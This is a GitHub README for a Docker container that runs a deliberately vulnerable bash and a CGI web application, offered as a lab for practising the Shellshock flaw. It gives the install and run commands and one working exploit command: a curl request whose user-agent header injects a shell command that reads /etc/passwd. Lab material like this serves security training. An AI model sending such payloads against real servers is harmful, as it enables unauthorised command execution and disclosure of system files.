Skip to content
Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock
Branch: master
Clone or download
Type Name Latest commit message Commit time
Failed to load latest commit information.
Dockerfile Minor changes Jul 12, 2015 Create Jul 11, 2015 Edited syntax highlighting Aug 4, 2015
index.html Minor changes Jul 12, 2015
stats Added Docker files Jul 11, 2015

Vulnerability as a Service - CVE 2014-6271

A Debian (Wheezy) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.


This docker container is based on Debian Wheezy and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.


Install the container with docker pull hmlio/vaas-cve-2014-6271

Run the container with a port mapping docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

You should be able to access the web application at http://your-ip:8080/.


The web application/vulnerable bash version can be exploited as shown below:

# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats



The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse. For further details please see,113/.

You can’t perform that action at this time.